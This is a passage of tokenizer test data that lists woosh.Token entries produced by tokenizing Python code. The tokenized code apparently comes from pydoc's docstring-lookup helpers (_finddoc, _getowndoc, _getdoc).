woosh.Token(woosh.OP, '(', 113, 27, 113, 28),
woosh.Token(woosh.NAME, 'obj', 113, 28, 113, 31),
woosh.Token(woosh.OP, ')', 113, 31, 113, 32),
woosh.Token(woosh.OP, ':', 113, 32, 113, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 113, 33, 114, 0),
woosh.Token(woosh.INDENT, ' ', 114, 0, 114, 8),
woosh.Token(woosh.NAME, 'name', 114, 8, 114, 12),
woosh.Token(woosh.OP, '=', 114, 13, 114, 14),
woosh.Token(woosh.NAME, 'obj', 114, 15, 114, 18),
woosh.Token(woosh.OP, '.', 114, 18, 114, 19),
woosh.Token(woosh.NAME, '__name__', 114, 19, 114, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 114, 27, 115, 0),
woosh.Token(woosh.NAME, 'cls', 115, 8, 115, 11),
woosh.Token(woosh.OP, '=', 115, 12, 115, 13),
woosh.Token(woosh.NAME, '_findclass', 115, 14, 115, 24),
woosh.Token(woosh.OP, '(', 115, 24, 115, 25),
woosh.Token(woosh.NAME, 'obj', 115, 25, 115, 28),
woosh.Token(woosh.OP, ')', 115, 28, 115, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 115, 29, 116, 0),
woosh.Token(woosh.NAME, 'if', 116, 8, 116, 10),
woosh.Token(woosh.NAME, 'cls', 116, 11, 116, 14),
woosh.Token(woosh.NAME, 'is', 116, 15, 116, 17),
woosh.Token(woosh.NAME, 'None', 116, 18, 116, 22),
woosh.Token(woosh.NAME, 'or', 116, 23, 116, 25),
woosh.Token(woosh.NAME, 'getattr', 116, 26, 116, 33),
woosh.Token(woosh.OP, '(', 116, 33, 116, 34),
woosh.Token(woosh.NAME, 'cls', 116, 34, 116, 37),
woosh.Token(woosh.OP, ',', 116, 37, 116, 38),
woosh.Token(woosh.NAME, 'name', 116, 39, 116, 43),
woosh.Token(woosh.OP, ')', 116, 43, 116, 44),
woosh.Token(woosh.NAME, 'is', 116, 45, 116, 47),
woosh.Token(woosh.NAME, 'not', 116, 48, 116, 51),
woosh.Token(woosh.NAME, 'obj', 116, 52, 116, 55),
woosh.Token(woosh.OP, ':', 116, 55, 116, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 116, 56, 117, 0),
woosh.Token(woosh.INDENT, ' ', 117, 0, 117, 12),
woosh.Token(woosh.NAME, 'return', 117, 12, 117, 18),
woosh.Token(woosh.NAME, 'None', 117, 19, 117, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 117, 23, 118, 0),
woosh.Token(woosh.DEDENT, ' ', 118, 0, 118, 4),
woosh.Token(woosh.DEDENT, '', 118, 4, 118, 4),
woosh.Token(woosh.NAME, 'elif', 118, 4, 118, 8),
woosh.Token(woosh.NAME, 'inspect', 118, 9, 118, 16),
woosh.Token(woosh.OP, '.', 118, 16, 118, 17),
woosh.Token(woosh.NAME, 'isbuiltin', 118, 17, 118, 26),
woosh.Token(woosh.OP, '(', 118, 26, 118, 27),
woosh.Token(woosh.NAME, 'obj', 118, 27, 118, 30),
woosh.Token(woosh.OP, ')', 118, 30, 118, 31),
woosh.Token(woosh.OP, ':', 118, 31, 118, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 118, 32, 119, 0),
woosh.Token(woosh.INDENT, ' ', 119, 0, 119, 8),
woosh.Token(woosh.NAME, 'name', 119, 8, 119, 12),
woosh.Token(woosh.OP, '=', 119, 13, 119, 14),
woosh.Token(woosh.NAME, 'obj', 119, 15, 119, 18),
woosh.Token(woosh.OP, '.', 119, 18, 119, 19),
woosh.Token(woosh.NAME, '__name__', 119, 19, 119, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 119, 27, 120, 0),
woosh.Token(woosh.NAME, 'self', 120, 8, 120, 12),
woosh.Token(woosh.OP, '=', 120, 13, 120, 14),
woosh.Token(woosh.NAME, 'obj', 120, 15, 120, 18),
woosh.Token(woosh.OP, '.', 120, 18, 120, 19),
woosh.Token(woosh.NAME, '__self__', 120, 19, 120, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 120, 27, 121, 0),
woosh.Token(woosh.NAME, 'if', 121, 8, 121, 10),
woosh.Token(woosh.OP, '(', 121, 11, 121, 12),
woosh.Token(woosh.NAME, 'inspect', 121, 12, 121, 19),
woosh.Token(woosh.OP, '.', 121, 19, 121, 20),
woosh.Token(woosh.NAME, 'isclass', 121, 20, 121, 27),
woosh.Token(woosh.OP, '(', 121, 27, 121, 28),
woosh.Token(woosh.NAME, 'self', 121, 28, 121, 32),
woosh.Token(woosh.OP, ')', 121, 32, 121, 33),
woosh.Token(woosh.NAME, 'and', 121, 34, 121, 37),
woosh.Token(woosh.NAME, 'self', 122, 12, 122, 16),
woosh.Token(woosh.OP, '.', 122, 16, 122, 17),
woosh.Token(woosh.NAME, '__qualname__', 122, 17, 122, 29),
woosh.Token(woosh.OP, '+', 122, 30, 122, 31),
woosh.Token(woosh.STRING, "'.'", 122, 32, 122, 35),
woosh.Token(woosh.OP, '+', 122, 36, 122, 37),
woosh.Token(woosh.NAME, 'name', 122, 38, 122, 42),
woosh.Token(woosh.OP, '==', 122, 43, 122, 45),
woosh.Token(woosh.NAME, 'obj', 122, 46, 122, 49),
woosh.Token(woosh.OP, '.', 122, 49, 122, 50),
woosh.Token(woosh.NAME, '__qualname__', 122, 50, 122, 62),
woosh.Token(woosh.OP, ')', 122, 62, 122, 63),
woosh.Token(woosh.OP, ':', 122, 63, 122, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 122, 64, 123, 0),
woosh.Token(woosh.COMMENT, '# classmethod', 123, 12, 123, 25),
woosh.Token(woosh.INDENT, ' ', 124, 0, 124, 12),
woosh.Token(woosh.NAME, 'cls', 124, 12, 124, 15),
woosh.Token(woosh.OP, '=', 124, 16, 124, 17),
woosh.Token(woosh.NAME, 'self', 124, 18, 124, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 124, 22, 125, 0),
woosh.Token(woosh.DEDENT, ' ', 125, 0, 125, 8),
woosh.Token(woosh.NAME, 'else', 125, 8, 125, 12),
woosh.Token(woosh.OP, ':', 125, 12, 125, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 125, 13, 126, 0),
woosh.Token(woosh.INDENT, ' ', 126, 0, 126, 12),
woosh.Token(woosh.NAME, 'cls', 126, 12, 126, 15),
woosh.Token(woosh.OP, '=', 126, 16, 126, 17),
woosh.Token(woosh.NAME, 'self', 126, 18, 126, 22),
woosh.Token(woosh.OP, '.', 126, 22, 126, 23),
woosh.Token(woosh.NAME, '__class__', 126, 23, 126, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 126, 32, 127, 0),
woosh.Token(woosh.COMMENT, '# Should be tested before isdatadescriptor().', 127, 4, 127, 49),
woosh.Token(woosh.DEDENT, ' ', 128, 0, 128, 4),
woosh.Token(woosh.DEDENT, '', 128, 4, 128, 4),
woosh.Token(woosh.NAME, 'elif', 128, 4, 128, 8),
woosh.Token(woosh.NAME, 'isinstance', 128, 9, 128, 19),
woosh.Token(woosh.OP, '(', 128, 19, 128, 20),
woosh.Token(woosh.NAME, 'obj', 128, 20, 128, 23),
woosh.Token(woosh.OP, ',', 128, 23, 128, 24),
woosh.Token(woosh.NAME, 'property', 128, 25, 128, 33),
woosh.Token(woosh.OP, ')', 128, 33, 128, 34),
woosh.Token(woosh.OP, ':', 128, 34, 128, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 128, 35, 129, 0),
woosh.Token(woosh.INDENT, ' ', 129, 0, 129, 8),
woosh.Token(woosh.NAME, 'func', 129, 8, 129, 12),
woosh.Token(woosh.OP, '=', 129, 13, 129, 14),
woosh.Token(woosh.NAME, 'obj', 129, 15, 129, 18),
woosh.Token(woosh.OP, '.', 129, 18, 129, 19),
woosh.Token(woosh.NAME, 'fget', 129, 19, 129, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 129, 23, 130, 0),
woosh.Token(woosh.NAME, 'name', 130, 8, 130, 12),
woosh.Token(woosh.OP, '=', 130, 13, 130, 14),
woosh.Token(woosh.NAME, 'func', 130, 15, 130, 19),
woosh.Token(woosh.OP, '.', 130, 19, 130, 20),
woosh.Token(woosh.NAME, '__name__', 130, 20, 130, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 130, 28, 131, 0),
woosh.Token(woosh.NAME, 'cls', 131, 8, 131, 11),
woosh.Token(woosh.OP, '=', 131, 12, 131, 13),
woosh.Token(woosh.NAME, '_findclass', 131, 14, 131, 24),
woosh.Token(woosh.OP, '(', 131, 24, 131, 25),
woosh.Token(woosh.NAME, 'func', 131, 25, 131, 29),
woosh.Token(woosh.OP, ')', 131, 29, 131, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 131, 30, 132, 0),
woosh.Token(woosh.NAME, 'if', 132, 8, 132, 10),
woosh.Token(woosh.NAME, 'cls', 132, 11, 132, 14),
woosh.Token(woosh.NAME, 'is', 132, 15, 132, 17),
woosh.Token(woosh.NAME, 'None', 132, 18, 132, 22),
woosh.Token(woosh.NAME, 'or', 132, 23, 132, 25),
woosh.Token(woosh.NAME, 'getattr', 132, 26, 132, 33),
woosh.Token(woosh.OP, '(', 132, 33, 132, 34),
woosh.Token(woosh.NAME, 'cls', 132, 34, 132, 37),
woosh.Token(woosh.OP, ',', 132, 37, 132, 38),
woosh.Token(woosh.NAME, 'name', 132, 39, 132, 43),
woosh.Token(woosh.OP, ')', 132, 43, 132, 44),
woosh.Token(woosh.NAME, 'is', 132, 45, 132, 47),
woosh.Token(woosh.NAME, 'not', 132, 48, 132, 51),
woosh.Token(woosh.NAME, 'obj', 132, 52, 132, 55),
woosh.Token(woosh.OP, ':', 132, 55, 132, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 132, 56, 133, 0),
woosh.Token(woosh.INDENT, ' ', 133, 0, 133, 12),
woosh.Token(woosh.NAME, 'return', 133, 12, 133, 18),
woosh.Token(woosh.NAME, 'None', 133, 19, 133, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 133, 23, 134, 0),
woosh.Token(woosh.DEDENT, ' ', 134, 0, 134, 4),
woosh.Token(woosh.DEDENT, '', 134, 4, 134, 4),
woosh.Token(woosh.NAME, 'elif', 134, 4, 134, 8),
woosh.Token(woosh.NAME, 'inspect', 134, 9, 134, 16),
woosh.Token(woosh.OP, '.', 134, 16, 134, 17),
woosh.Token(woosh.NAME, 'ismethoddescriptor', 134, 17, 134, 35),
woosh.Token(woosh.OP, '(', 134, 35, 134, 36),
woosh.Token(woosh.NAME, 'obj', 134, 36, 134, 39),
woosh.Token(woosh.OP, ')', 134, 39, 134, 40),
woosh.Token(woosh.NAME, 'or', 134, 41, 134, 43),
woosh.Token(woosh.NAME, 'inspect', 134, 44, 134, 51),
woosh.Token(woosh.OP, '.', 134, 51, 134, 52),
woosh.Token(woosh.NAME, 'isdatadescriptor', 134, 52, 134, 68),
woosh.Token(woosh.OP, '(', 134, 68, 134, 69),
woosh.Token(woosh.NAME, 'obj', 134, 69, 134, 72),
woosh.Token(woosh.OP, ')', 134, 72, 134, 73),
woosh.Token(woosh.OP, ':', 134, 73, 134, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 134, 74, 135, 0),
woosh.Token(woosh.INDENT, ' ', 135, 0, 135, 8),
woosh.Token(woosh.NAME, 'name', 135, 8, 135, 12),
woosh.Token(woosh.OP, '=', 135, 13, 135, 14),
woosh.Token(woosh.NAME, 'obj', 135, 15, 135, 18),
woosh.Token(woosh.OP, '.', 135, 18, 135, 19),
woosh.Token(woosh.NAME, '__name__', 135, 19, 135, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 135, 27, 136, 0),
woosh.Token(woosh.NAME, 'cls', 136, 8, 136, 11),
woosh.Token(woosh.OP, '=', 136, 12, 136, 13),
woosh.Token(woosh.NAME, 'obj', 136, 14, 136, 17),
woosh.Token(woosh.OP, '.', 136, 17, 136, 18),
woosh.Token(woosh.NAME, '__objclass__', 136, 18, 136, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 136, 30, 137, 0),
woosh.Token(woosh.NAME, 'if', 137, 8, 137, 10),
woosh.Token(woosh.NAME, 'getattr', 137, 11, 137, 18),
woosh.Token(woosh.OP, '(', 137, 18, 137, 19),
woosh.Token(woosh.NAME, 'cls', 137, 19, 137, 22),
woosh.Token(woosh.OP, ',', 137, 22, 137, 23),
woosh.Token(woosh.NAME, 'name', 137, 24, 137, 28),
woosh.Token(woosh.OP, ')', 137, 28, 137, 29),
woosh.Token(woosh.NAME, 'is', 137, 30, 137, 32),
woosh.Token(woosh.NAME, 'not', 137, 33, 137, 36),
woosh.Token(woosh.NAME, 'obj', 137, 37, 137, 40),
woosh.Token(woosh.OP, ':', 137, 40, 137, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 137, 41, 138, 0),
woosh.Token(woosh.INDENT, ' ', 138, 0, 138, 12),
woosh.Token(woosh.NAME, 'return', 138, 12, 138, 18),
woosh.Token(woosh.NAME, 'None', 138, 19, 138, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 138, 23, 139, 0),
woosh.Token(woosh.DEDENT, ' ', 139, 0, 139, 8),
woosh.Token(woosh.NAME, 'if', 139, 8, 139, 10),
woosh.Token(woosh.NAME, 'inspect', 139, 11, 139, 18),
woosh.Token(woosh.OP, '.', 139, 18, 139, 19),
woosh.Token(woosh.NAME, 'ismemberdescriptor', 139, 19, 139, 37),
woosh.Token(woosh.OP, '(', 139, 37, 139, 38),
woosh.Token(woosh.NAME, 'obj', 139, 38, 139, 41),
woosh.Token(woosh.OP, ')', 139, 41, 139, 42),
woosh.Token(woosh.OP, ':', 139, 42, 139, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 139, 43, 140, 0),
woosh.Token(woosh.INDENT, ' ', 140, 0, 140, 12),
woosh.Token(woosh.NAME, 'slots', 140, 12, 140, 17),
woosh.Token(woosh.OP, '=', 140, 18, 140, 19),
woosh.Token(woosh.NAME, 'getattr', 140, 20, 140, 27),
woosh.Token(woosh.OP, '(', 140, 27, 140, 28),
woosh.Token(woosh.NAME, 'cls', 140, 28, 140, 31),
woosh.Token(woosh.OP, ',', 140, 31, 140, 32),
woosh.Token(woosh.STRING, "'__slots__'", 140, 33, 140, 44),
woosh.Token(woosh.OP, ',', 140, 44, 140, 45),
woosh.Token(woosh.NAME, 'None', 140, 46, 140, 50),
woosh.Token(woosh.OP, ')', 140, 50, 140, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 140, 51, 141, 0),
woosh.Token(woosh.NAME, 'if', 141, 12, 141, 14),
woosh.Token(woosh.NAME, 'isinstance', 141, 15, 141, 25),
woosh.Token(woosh.OP, '(', 141, 25, 141, 26),
woosh.Token(woosh.NAME, 'slots', 141, 26, 141, 31),
woosh.Token(woosh.OP, ',', 141, 31, 141, 32),
woosh.Token(woosh.NAME, 'dict', 141, 33, 141, 37),
woosh.Token(woosh.OP, ')', 141, 37, 141, 38),
woosh.Token(woosh.NAME, 'and', 141, 39, 141, 42),
woosh.Token(woosh.NAME, 'name', 141, 43, 141, 47),
woosh.Token(woosh.NAME, 'in', 141, 48, 141, 50),
woosh.Token(woosh.NAME, 'slots', 141, 51, 141, 56),
woosh.Token(woosh.OP, ':', 141, 56, 141, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 141, 57, 142, 0),
woosh.Token(woosh.INDENT, ' ', 142, 0, 142, 16),
woosh.Token(woosh.NAME, 'return', 142, 16, 142, 22),
woosh.Token(woosh.NAME, 'slots', 142, 23, 142, 28),
woosh.Token(woosh.OP, '[', 142, 28, 142, 29),
woosh.Token(woosh.NAME, 'name', 142, 29, 142, 33),
woosh.Token(woosh.OP, ']', 142, 33, 142, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 142, 34, 143, 0),
woosh.Token(woosh.DEDENT, ' ', 143, 0, 143, 4),
woosh.Token(woosh.DEDENT, '', 143, 4, 143, 4),
woosh.Token(woosh.DEDENT, '', 143, 4, 143, 4),
woosh.Token(woosh.NAME, 'else', 143, 4, 143, 8),
woosh.Token(woosh.OP, ':', 143, 8, 143, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 143, 9, 144, 0),
woosh.Token(woosh.INDENT, ' ', 144, 0, 144, 8),
woosh.Token(woosh.NAME, 'return', 144, 8, 144, 14),
woosh.Token(woosh.NAME, 'None', 144, 15, 144, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 144, 19, 145, 0),
woosh.Token(woosh.DEDENT, ' ', 145, 0, 145, 4),
woosh.Token(woosh.NAME, 'for', 145, 4, 145, 7),
woosh.Token(woosh.NAME, 'base', 145, 8, 145, 12),
woosh.Token(woosh.NAME, 'in', 145, 13, 145, 15),
woosh.Token(woosh.NAME, 'cls', 145, 16, 145, 19),
woosh.Token(woosh.OP, '.', 145, 19, 145, 20),
woosh.Token(woosh.NAME, '__mro__', 145, 20, 145, 27),
woosh.Token(woosh.OP, ':', 145, 27, 145, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 145, 28, 146, 0),
woosh.Token(woosh.INDENT, ' ', 146, 0, 146, 8),
woosh.Token(woosh.NAME, 'try', 146, 8, 146, 11),
woosh.Token(woosh.OP, ':', 146, 11, 146, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 146, 12, 147, 0),
woosh.Token(woosh.INDENT, ' ', 147, 0, 147, 12),
woosh.Token(woosh.NAME, 'doc', 147, 12, 147, 15),
woosh.Token(woosh.OP, '=', 147, 16, 147, 17),
woosh.Token(woosh.NAME, '_getowndoc', 147, 18, 147, 28),
woosh.Token(woosh.OP, '(', 147, 28, 147, 29),
woosh.Token(woosh.NAME, 'getattr', 147, 29, 147, 36),
woosh.Token(woosh.OP, '(', 147, 36, 147, 37),
woosh.Token(woosh.NAME, 'base', 147, 37, 147, 41),
woosh.Token(woosh.OP, ',', 147, 41, 147, 42),
woosh.Token(woosh.NAME, 'name', 147, 43, 147, 47),
woosh.Token(woosh.OP, ')', 147, 47, 147, 48),
woosh.Token(woosh.OP, ')', 147, 48, 147, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 147, 49, 148, 0),
woosh.Token(woosh.DEDENT, ' ', 148, 0, 148, 8),
woosh.Token(woosh.NAME, 'except', 148, 8, 148, 14),
woosh.Token(woosh.NAME, 'AttributeError', 148, 15, 148, 29),
woosh.Token(woosh.OP, ':', 148, 29, 148, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 148, 30, 149, 0),
woosh.Token(woosh.INDENT, ' ', 149, 0, 149, 12),
woosh.Token(woosh.NAME, 'continue', 149, 12, 149, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 149, 20, 150, 0),
woosh.Token(woosh.DEDENT, ' ', 150, 0, 150, 8),
woosh.Token(woosh.NAME, 'if', 150, 8, 150, 10),
woosh.Token(woosh.NAME, 'doc', 150, 11, 150, 14),
woosh.Token(woosh.NAME, 'is', 150, 15, 150, 17),
woosh.Token(woosh.NAME, 'not', 150, 18, 150, 21),
woosh.Token(woosh.NAME, 'None', 150, 22, 150, 26),
woosh.Token(woosh.OP, ':', 150, 26, 150, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 150, 27, 151, 0),
woosh.Token(woosh.INDENT, ' ', 151, 0, 151, 12),
woosh.Token(woosh.NAME, 'return', 151, 12, 151, 18),
woosh.Token(woosh.NAME, 'doc', 151, 19, 151, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 151, 22, 152, 0),
woosh.Token(woosh.DEDENT, ' ', 152, 0, 152, 4),
woosh.Token(woosh.DEDENT, '', 152, 4, 152, 4),
woosh.Token(woosh.NAME, 'return', 152, 4, 152, 10),
woosh.Token(woosh.NAME, 'None', 152, 11, 152, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 152, 15, 153, 0),
woosh.Token(woosh.DEDENT, '', 154, 0, 154, 0),
woosh.Token(woosh.NAME, 'def', 154, 0, 154, 3),
woosh.Token(woosh.NAME, '_getowndoc', 154, 4, 154, 14),
woosh.Token(woosh.OP, '(', 154, 14, 154, 15),
woosh.Token(woosh.NAME, 'obj', 154, 15, 154, 18),
woosh.Token(woosh.OP, ')', 154, 18, 154, 19),
woosh.Token(woosh.OP, ':', 154, 19, 154, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 154, 20, 155, 0),
woosh.Token(woosh.INDENT, ' ', 155, 0, 155, 4),
woosh.Token(woosh.STRING, '"""Get the documentation string for an object if it is not\r\n inherited from its class."""', 155, 4, 156, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 156, 32, 157, 0),
woosh.Token(woosh.NAME, 'try', 157, 4, 157, 7),
woosh.Token(woosh.OP, ':', 157, 7, 157, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 157, 8, 158, 0),
woosh.Token(woosh.INDENT, ' ', 158, 0, 158, 8),
woosh.Token(woosh.NAME, 'doc', 158, 8, 158, 11),
woosh.Token(woosh.OP, '=', 158, 12, 158, 13),
woosh.Token(woosh.NAME, 'object', 158, 14, 158, 20),
woosh.Token(woosh.OP, '.', 158, 20, 158, 21),
woosh.Token(woosh.NAME, '__getattribute__', 158, 21, 158, 37),
woosh.Token(woosh.OP, '(', 158, 37, 158, 38),
woosh.Token(woosh.NAME, 'obj', 158, 38, 158, 41),
woosh.Token(woosh.OP, ',', 158, 41, 158, 42),
woosh.Token(woosh.STRING, "'__doc__'", 158, 43, 158, 52),
woosh.Token(woosh.OP, ')', 158, 52, 158, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 158, 53, 159, 0),
woosh.Token(woosh.NAME, 'if', 159, 8, 159, 10),
woosh.Token(woosh.NAME, 'doc', 159, 11, 159, 14),
woosh.Token(woosh.NAME, 'is', 159, 15, 159, 17),
woosh.Token(woosh.NAME, 'None', 159, 18, 159, 22),
woosh.Token(woosh.OP, ':', 159, 22, 159, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 159, 23, 160, 0),
woosh.Token(woosh.INDENT, ' ', 160, 0, 160, 12),
woosh.Token(woosh.NAME, 'return', 160, 12, 160, 18),
woosh.Token(woosh.NAME, 'None', 160, 19, 160, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 160, 23, 161, 0),
woosh.Token(woosh.DEDENT, ' ', 161, 0, 161, 8),
woosh.Token(woosh.NAME, 'if', 161, 8, 161, 10),
woosh.Token(woosh.NAME, 'obj', 161, 11, 161, 14),
woosh.Token(woosh.NAME, 'is', 161, 15, 161, 17),
woosh.Token(woosh.NAME, 'not', 161, 18, 161, 21),
woosh.Token(woosh.NAME, 'type', 161, 22, 161, 26),
woosh.Token(woosh.OP, ':', 161, 26, 161, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 161, 27, 162, 0),
woosh.Token(woosh.INDENT, ' ', 162, 0, 162, 12),
woosh.Token(woosh.NAME, 'typedoc', 162, 12, 162, 19),
woosh.Token(woosh.OP, '=', 162, 20, 162, 21),
woosh.Token(woosh.NAME, 'type', 162, 22, 162, 26),
woosh.Token(woosh.OP, '(', 162, 26, 162, 27),
woosh.Token(woosh.NAME, 'obj', 162, 27, 162, 30),
woosh.Token(woosh.OP, ')', 162, 30, 162, 31),
woosh.Token(woosh.OP, '.', 162, 31, 162, 32),
woosh.Token(woosh.NAME, '__doc__', 162, 32, 162, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 162, 39, 163, 0),
woosh.Token(woosh.NAME, 'if', 163, 12, 163, 14),
woosh.Token(woosh.NAME, 'isinstance', 163, 15, 163, 25),
woosh.Token(woosh.OP, '(', 163, 25, 163, 26),
woosh.Token(woosh.NAME, 'typedoc', 163, 26, 163, 33),
woosh.Token(woosh.OP, ',', 163, 33, 163, 34),
woosh.Token(woosh.NAME, 'str', 163, 35, 163, 38),
woosh.Token(woosh.OP, ')', 163, 38, 163, 39),
woosh.Token(woosh.NAME, 'and', 163, 40, 163, 43),
woosh.Token(woosh.NAME, 'typedoc', 163, 44, 163, 51),
woosh.Token(woosh.OP, '==', 163, 52, 163, 54),
woosh.Token(woosh.NAME, 'doc', 163, 55, 163, 58),
woosh.Token(woosh.OP, ':', 163, 58, 163, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 163, 59, 164, 0),
woosh.Token(woosh.INDENT, ' ', 164, 0, 164, 16),
woosh.Token(woosh.NAME, 'return', 164, 16, 164, 22),
woosh.Token(woosh.NAME, 'None', 164, 23, 164, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 164, 27, 165, 0),
woosh.Token(woosh.DEDENT, ' ', 165, 0, 165, 8),
woosh.Token(woosh.DEDENT, '', 165, 8, 165, 8),
woosh.Token(woosh.NAME, 'return', 165, 8, 165, 14),
woosh.Token(woosh.NAME, 'doc', 165, 15, 165, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 165, 18, 166, 0),
woosh.Token(woosh.DEDENT, ' ', 166, 0, 166, 4),
woosh.Token(woosh.NAME, 'except', 166, 4, 166, 10),
woosh.Token(woosh.NAME, 'AttributeError', 166, 11, 166, 25),
woosh.Token(woosh.OP, ':', 166, 25, 166, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 166, 26, 167, 0),
woosh.Token(woosh.INDENT, ' ', 167, 0, 167, 8),
woosh.Token(woosh.NAME, 'return', 167, 8, 167, 14),
woosh.Token(woosh.NAME, 'None', 167, 15, 167, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 167, 19, 168, 0),
woosh.Token(woosh.DEDENT, '', 169, 0, 169, 0),
woosh.Token(woosh.DEDENT, '', 169, 0, 169, 0),
woosh.Token(woosh.NAME, 'def', 169, 0, 169, 3),
woosh.Token(woosh.NAME, '_getdoc', 169, 4, 169, 11),
woosh.Token(woosh.OP, '(', 169, 11, 169, 12),
woosh.Token(woosh.NAME, 'object', 169, 12, 169, 18),
woosh.Token(woosh.OP, ')', 169, 18, 169, 19),
woosh.Token(woosh.OP, ':', 169, 19, 169, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 169, 20, 170, 0),
woosh.Token(woosh.INDENT, ' ', 170, 0, 170, 4),
woosh.Token(woosh.STRING, '"""Get the documentation string for an object.\r\n\r\n All tabs are expanded to spaces. To clean up docstrings that are\r\n indented to line up with blocks of code, any whitespace than can be\r\n uniformly removed from the second line onwards is removed."""', 170, 4, 174, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 174, 65, 175, 0),
woosh.Token(woosh.NAME, 'doc', 175, 4, 175, 7),
woosh.Token(woosh.OP, '=', 175, 8, 175, 9),
woosh.Token(woosh.NAME, '_getowndoc', 175, 10, 175, 20),
woosh.Token(woosh.OP, '(', 175, 20, 175, 21),
woosh.Token(woosh.NAME, 'object', 175, 21, 175, 27),
woosh.Token(woosh.OP, ')', 175, 27, 175, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 175, 28, 176, 0),
woosh.Token(woosh.NAME, 'if', 176, 4, 176, 6),
woosh.Token(woosh.NAME, 'doc', 176, 7, 176, 10),
woosh.Token(woosh.NAME, 'is', 176, 11, 176, 13),
woosh.Token(woosh.NAME, 'None', 176, 14, 176, 18),
woosh.Token(woosh.OP, ':', 176, 18, 176, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 176, 19, 177, 0),
woosh.Token(woosh.INDENT, ' ', 177, 0, 177, 8),
woosh.Token(woosh.NAME, 'try', 177, 8, 177, 11),
woosh.Token(woosh.OP, ':', 177, 11, 177, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 177, 12, 178, 0),
woosh.Token(woosh.INDENT, ' ', 178, 0, 178, 12),
woosh.Token(woosh.NAME, 'doc', 178, 12, 178, 15),
woosh.Token(woosh.OP, '=', 178, 16, 178, 17),
woosh.Token(woosh.NAME, '_finddoc', 178, 18, 178, 26),
woosh.Token(woosh.OP, '(', 178, 26, 178, 27),
woosh.Token(woosh.NAME, 'object', 178, 27, 178, 33),
woosh.Token(woosh.OP, ')', 178, 33, 178, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 178, 34, 179, 0),
woosh.Token(woosh.DEDENT, ' ', 179, 0, 179, 8),
woosh.Token(woosh.NAME, 'except', 179, 8, 179, 14),
woosh.Token(woosh.OP, '(', 179, 15, 179, 16),
woosh.Token(woosh.NAME, 'AttributeError', 179, 16, 179, 30),
woosh.Token(woosh.OP, ',', 179, 30, 179, 31),
woosh.Token(woosh.NAME, 'TypeError', 179, 32, 179, 41),
woosh.Token(woosh.OP, ')', 179, 41, 179, 42),
woosh.Token(woosh.OP, ':', 179, 42, 179, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 179, 43, 180, 0),
woosh.Token(woosh.INDENT, ' ', 180, 0, 180, 12),
woosh.Token(woosh.NAME, 'return', 180, 12, 180, 18),
woosh.Token(woosh.NAME, 'None', 180, 19, 180, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 180, 23, 181, 0),
woosh.Token(woosh.DEDENT, ' ', 181, 0, 181, 4),
woosh.Token(woosh.DEDENT, '', 181, 4, 181, 4),
woosh.Token(woosh.NAME, 'if', 181, 4, 181, 6),
woosh.Token(woosh.NAME, 'not', 181, 7, 181, 10),
woosh.Token(woosh.NAME, 'isinstance', 181, 11, 181, 21),
woosh.Token(woosh.OP, '(', 181, 21, 181, 22),
woosh.Token(woosh.NAME, 'doc', 181, 22, 181, 25),
woosh.Token(woosh.OP, ',', 181, 25, 181, 26),
woosh.Token(woosh.NAME, 'str', 181, 27, 181, 30),
woosh.Token(woosh.OP, ')', 181, 30, 181, 31),
woosh.Token(woosh.OP, ':', 181, 31, 181, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 181, 32, 182, 0),
woosh.Token(woosh.INDENT, ' ', 182, 0, 182, 8),
woosh.Token(woosh.NAME, 'return', 182, 8, 182, 14),
woosh.Token(woosh.NAME, 'None', 182, 15, 182, 19),
